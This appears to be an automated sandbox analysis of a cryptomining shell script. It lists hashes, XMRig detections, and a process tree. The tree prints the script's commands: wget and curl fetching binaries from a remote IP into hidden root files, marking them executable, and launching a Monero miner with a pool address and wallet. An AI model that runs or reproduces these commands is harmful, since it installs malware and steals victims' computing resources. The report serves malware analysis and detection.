Analysis
- max time kernel: 149s
- max time network: 151s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240418-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 21/10/2024, 01:53

Static task
- static1

Behavioral tasks
- behavioral1: sample 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh, resource ubuntu1804-amd64-20240729-en
- behavioral2: sample 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh, resource debian9-armhf-20240611-en
- behavioral3: sample 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh, resource debian9-mipsbe-20240729-en
- behavioral4: sample 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh, resource debian9-mipsel-20240418-en

General
- Target: 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
- Size: 700B
- MD5: c4d089011765cf8fa828d28b6eeeac3e
- SHA1: 43d933e706b0eefd0db2b5acba19205ebc1af2bd
- SHA256: 37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19
- SHA512: 3f55a27fc44062f48d0ee1c11c7b2ece0d3478e89744618d337dd2854b3b68e7e6161d0e38e21b32b4f85a1ee2d2fb523c7b94cc984fdff36ef65a9ddf45bae9
Malware Config

Signatures

XMRig Miner payload (2 IoCs)
- behavioral4/files/fstream-1.dat: yara_rule family_xmrig
- behavioral4/files/fstream-1.dat: yara_rule xmrig

File and Directory Permissions Modification (1 TTP, 21 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
- chmod: PIDs 885, 850, 855, 856, 862, 878, 879, 896, 844, 849, 861, 873, 829, 830, 843, 889, 895, 831, 867, 872, 884

Executes dropped EXE (12 IoCs)
- /.__min__c: PIDs 835, 845, 851, 857, 863, 874, 880, 886, 897
- /.__min__: PIDs 837, 869, 891

- behavioral4/files/fstream-2.dat: yara_rule upx

Enumerates kernel/hardware configuration (1 TTP, 1 IoC)
Reads contents of /sys virtual filesystem to enumerate system information.
- File opened for reading: /sys/devices/system/cpu (process: nproc)

- File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)

System Network Configuration Discovery (1 TTP, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
- .__min__: PIDs 837, 869, 891
Processes
- /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh (PID 718)
  command: /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
  - /usr/bin/wget: wget 205.185.117.101/log2 -O /dev/null (PID 720)
  - /usr/bin/curl: curl -L 205.185.117.101/log2 -o /dev/null (PID 738) [Reads runtime system information]
  - /usr/bin/wget: wget 205.185.117.101/__min__ -O /.__min__ (PID 747)
  - /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c (PID 824)
  - /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m (PID 825)
  - /bin/chmod: chmod +x /.__min__ (PID 829) [File and Directory Permissions Modification]
  - /bin/chmod: chmod +x /.__min__c (PID 830) [File and Directory Permissions Modification]
  - /bin/chmod: chmod +x /.__min__m (PID 831) [File and Directory Permissions Modification]
  - /usr/bin/nproc: nproc --all (PID 832) [Enumerates kernel/hardware configuration]
  - /bin/hostname: hostname (PID 834)
  - /.__min__c: /.__min__c (PID 835) [Executes dropped EXE]
  - /.__min__: /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsel-20240418-en-14 --tls -k (PID 837) [Executes dropped EXE; System Network Configuration Discovery]
  - /usr/bin/wget: wget 205.185.117.101/__min__ -O /.__min__ (PID 840)
  - /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c (PID 841)
  - /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m (PID 842)
  - /bin/chmod: chmod +x /.__min__c (PID 843) [File and Directory Permissions Modification]
  - /bin/chmod: chmod +x /.__min__m (PID 844) [File and Directory Permissions Modification]
  - /.__min__c: /.__min__c (PID 845) [Executes dropped EXE]
  - /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c (PID 847)
  - /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m (PID 848)
  - /bin/chmod: chmod +x /.__min__c (PID 849) [File and Directory Permissions Modification]
  - /bin/chmod: chmod +x /.__min__m (PID 850) [File and Directory Permissions Modification]
  - /.__min__c: /.__min__c (PID 851) [Executes dropped EXE]
  - /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c (PID 853)
  - /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m (PID 854)
  - /bin/chmod: chmod +x /.__min__c (PID 855) [File and Directory Permissions Modification]
  - /bin/chmod: chmod +x /.__min__m (PID 856) [File and Directory Permissions Modification]
  - /.__min__c: /.__min__c (PID 857) [Executes dropped EXE]
  - /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c (PID 859)
  - /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m (PID 860)
  - /bin/chmod: chmod +x /.__min__c (PID 861) [File and Directory Permissions Modification]
  - /bin/chmod: chmod +x /.__min__m (PID 862) [File and Directory Permissions Modification]
  - /.__min__c: /.__min__c (PID 863) [Executes dropped EXE]
  - /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c (PID 865)
  - /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m (PID 866)
  - /bin/chmod: chmod +x /.__min__ (PID 867) [File and Directory Permissions Modification]
  - /bin/hostname: hostname (PID 868)
  - /.__min__: /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsel-20240418-en-14 --tls -k (PID 869) [Executes dropped EXE; System Network Configuration Discovery]
  - /usr/bin/wget: wget 205.185.117.101/__min__ -O /.__min__ (PID 871)
  - /bin/chmod: chmod +x /.__min__c (PID 872) [File and Directory Permissions Modification]
  - /bin/chmod: chmod +x /.__min__m (PID 873) [File and Directory Permissions Modification]
  - /.__min__c: /.__min__c (PID 874) [Executes dropped EXE]
  - /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c (PID 876)
  - /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m (PID 877)
  - /bin/chmod: chmod +x /.__min__c (PID 878) [File and Directory Permissions Modification]
  - /bin/chmod: chmod +x /.__min__m (PID 879) [File and Directory Permissions Modification]
  - /.__min__c: /.__min__c (PID 880) [Executes dropped EXE]
  - /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c (PID 882)
  - /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m (PID 883)
  - /bin/chmod: chmod +x /.__min__c (PID 884) [File and Directory Permissions Modification]
  - /bin/chmod: chmod +x /.__min__m (PID 885) [File and Directory Permissions Modification]
  - /.__min__c: /.__min__c (PID 886) [Executes dropped EXE]
  - /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c (PID 888)
  - /bin/chmod: chmod +x /.__min__ (PID 889) [File and Directory Permissions Modification]
  - /bin/hostname: hostname (PID 890)
  - /.__min__: /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsel-20240418-en-14 --tls -k (PID 891) [Executes dropped EXE; System Network Configuration Discovery]
  - /usr/bin/wget: wget 205.185.117.101/__min__ -O /.__min__ (PID 893)
  - /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m (PID 894)
  - /bin/chmod: chmod +x /.__min__c (PID 895) [File and Directory Permissions Modification]
  - /bin/chmod: chmod +x /.__min__m (PID 896) [File and Directory Permissions Modification]
  - /.__min__c: /.__min__c (PID 897) [Executes dropped EXE]
  - /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c (PID 899)
  - /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m (PID 900)
Network
MITRE ATT&CK Enterprise v15
Downloads